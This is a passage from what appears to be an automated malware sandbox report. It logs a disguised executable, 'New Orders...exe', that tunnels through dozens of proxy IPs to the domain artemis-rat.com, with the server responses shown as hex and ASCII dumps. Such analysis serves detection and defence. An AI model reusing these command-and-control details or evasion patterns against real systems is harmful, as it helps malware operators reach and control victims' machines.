                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:17:27.231549025 CET19INHTTP/1.0 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        10192.168.2.949773162.243.102.20797647672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.276734114 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        11192.168.2.94973279.110.196.14580817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.289417028 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        12192.168.2.94974014.103.24.14880007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.301001072 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.625610113 CET711INHTTP/1.1 502 Bad Gateway
                                                                                        Server: nginx/1.19.2
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 559
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 39 2e 32 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><center><h1>502 Bad Gateway</h1></center><hr><center>nginx/1.19.2</center></body></html>... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->... a padding to disable MSIE and Chrome friendly error page -->


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        13192.168.2.94980345.12.31.3807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.310158968 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.464617014 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        14192.168.2.94979067.43.228.253310337672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.333280087 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        15192.168.2.949817104.17.84.150807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.343636990 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.498214006 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        16192.168.2.94974643.133.136.20888007672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.350089073 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:40.069916010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        17192.168.2.949819143.198.226.25807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.367599010 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.539531946 CET803INHTTP/1.1 500 Internal Server Error
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Server: Apache/2.4.57 (Ubuntu)
                                                                                        Content-Length: 611
                                                                                        Connection: close
                                                                                        Content-Type: text/html; charset=iso-8859-1
                                                                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 35 30 30 20 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 49 6e 74 65 72 6e 61 6c 20 53 65 72 76 65 72 20 45 72 72 6f 72 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 73 65 72 76 65 72 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 61 6e 20 69 6e 74 65 72 6e 61 6c 20 65 72 72 6f 72 20 6f 72 0a 6d 69 73 63 6f 6e 66 69 67 75 72 61 74 69 6f 6e 20 61 6e 64 20 77 61 73 20 75 6e 61 62 6c 65 20 74 6f 20 63 6f 6d 70 6c 65 74 65 0a 79 6f 75 72 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 70 3e 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 74 68 65 20 73 65 72 76 65 72 20 61 64 6d 69 6e 69 73 74 72 61 74 6f 72 20 61 74 20 0a 20 69 6e 66 6f 40 70 6f 77 61 62 69 74 2e 63 6f 6d 20 74 6f 20 69 6e 66 6f 72 6d 20 74 68 65 6d 20 6f 66 20 74 68 65 20 74 69 6d 65 20 74 68 69 73 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 2c 0a 20 61 6e 64 20 74 68 65 20 61 63 74 69 6f 6e 73 20 79 6f 75 20 70 65 72 66 6f 72 6d 65 64 20 6a 75 73 74 20 62 65 66 6f 72 65 20 74 68 69 73 20 65 72 72 6f 72 2e 3c 2f 70 3e 0a 3c 70 3e 4d 6f 72 65 20 69 6e 66 6f 72 6d 61 74 69 6f 6e 20 61 62 6f 75 74 20 74 68 69 73 20 65 72 72 6f 72 20 6d 61 79 20 62 65 20 61 76 61 69 6c 61 62 6c 65 0a 69 6e 20 74 68 65 20 73 65 72 76 65 72 20 65 72 72 6f 72 20 6c 6f 67 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 2f 32 2e 34 2e 35 37 20 28 55 62 75 6e 74 75 29 20 53 65 72 76 65 72 20 61 74 20 61 72 74 65 6d 69 73 2d 72 61 74 2e 63 6f 6d 20 50 6f 72 74 20 34 34 33 3c 2f 61 64 64 72 65 73 73 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                        Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>500 Internal Server Error</title></head><body><h1>Internal Server Error</h1><p>The server encountered an internal error ormisconfiguration and was unable to completeyour request.</p><p>Please contact the server administrator at info@powabit.com to inform them of the time this error occurred, and the actions you performed just before this error.</p><p>More information about this error may be availablein the server error log.</p><hr><address>Apache/2.4.57 (Ubuntu) Server at artemis-rat.com Port 443</address></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        18192.168.2.949825104.16.81.76807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.367687941 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.522110939 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        19192.168.2.949768185.108.141.1980807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.369328976 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:42.833365917 CET19INHTTP/1.1 200 OK


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        20192.168.2.94978020.37.207.880807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.391911983 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:54.695689917 CET72INHTTP/1.1 200 Connection established
                                                                                        Proxy-Agent: Fortinet-Proxy/1.0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        21192.168.2.949769138.36.150.1610807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.402509928 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        22192.168.2.949845185.162.229.127807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.419775009 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.573924065 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        23192.168.2.94982172.10.160.171263157672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.422239065 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        24192.168.2.949857172.67.187.242807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.438256979 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.592617035 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        25192.168.2.949866104.25.135.170807672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.460799932 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.616234064 CET316INHTTP/1.1 400 Bad Request
                                                                                        Server: cloudflare
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Content-Type: text/html
                                                                                        Content-Length: 155
                                                                                        Connection: close
                                                                                        CF-RAY: -
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 30 20 42 61 64 20 52 65 71 75 65 73 74 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>400 Bad Request</title></head><body><center><h1>400 Bad Request</h1></center><hr><center>cloudflare</center></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        26192.168.2.949812184.181.217.19441457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.461195946 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        27192.168.2.949827147.75.92.25194017672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.489007950 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.764646053 CET356INHTTP/1.0 502 Bad Gateway
                                                                                        Server: Zscaler/6.3
                                                                                        Content-Type: text/html
                                                                                        Connection: close
                                                                                        Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 35 30 32 20 42 61 64 20 47 61 74 65 77 61 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 31 3e 44 4e 53 20 65 72 72 6f 72 3c 2f 68 31 3e 0d 0a 3c 70 3e 44 4e 53 20 65 72 72 6f 72 20 28 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 70 61 67 65 20 79 6f 75 20 61 72 65 20 6c 6f 6f 6b 69 6e 67 20 66 6f 72 20 64 6f 65 73 20 6e 6f 74 20 65 78 69 73 74 29 3c 62 72 3e 3c 62 72 3e 50 6c 65 61 73 65 20 63 68 65 63 6b 20 74 68 61 74 20 74 68 65 20 68 6f 73 74 20 6e 61 6d 65 20 68 61 73 20 62 65 65 6e 20 73 70 65 6c 6c 65 64 20 63 6f 72 72 65 63 74 6c 79 2e 3c 62 72 3e 3c 2f 70 3e 0d 0a 3c 21 2d 2d 5a 73 63 61 6c 65 72 2f 36 2e 33 2d 2d 3e 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                        Data Ascii: <html><head><title>502 Bad Gateway</title></head><body><h1>DNS error</h1><p>DNS error (the host name of the page you are looking for does not exist)<br><br>Please check that the host name has been spelled correctly.<br></p>...Zscaler/6.3--></body></html>


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        28192.168.2.949807193.239.56.8480817672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.493002892 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        29192.168.2.94982815.236.106.23631287672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.512454033 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
                                                                                        Host: artemis-rat.com
                                                                                        Proxy-Connection: Keep-Alive
                                                                                        Mar 11, 2024 16:16:39.809518099 CET116INHTTP/1.1 200 OK
                                                                                        Date: Mon, 11 Mar 2024 15:16:39 GMT
                                                                                        Server: nginx
                                                                                        Content-Type: text/plain
                                                                                        Content-Length: 0


                                                                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                        30192.168.2.949862184.170.249.6541457672C:\Users\user\Desktop\New Orders#U034fx#U034fl#U034fx#U034f..exe
                                                                                        TimestampBytes transferredDirectionData
                                                                                        Mar 11, 2024 16:16:39.529323101 CET223OUTCONNECT artemis-rat.com:443 HTTP/1.1
                                                                                        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, killer Gecko) Chrome/58.0.3029.110 Safari/537.3
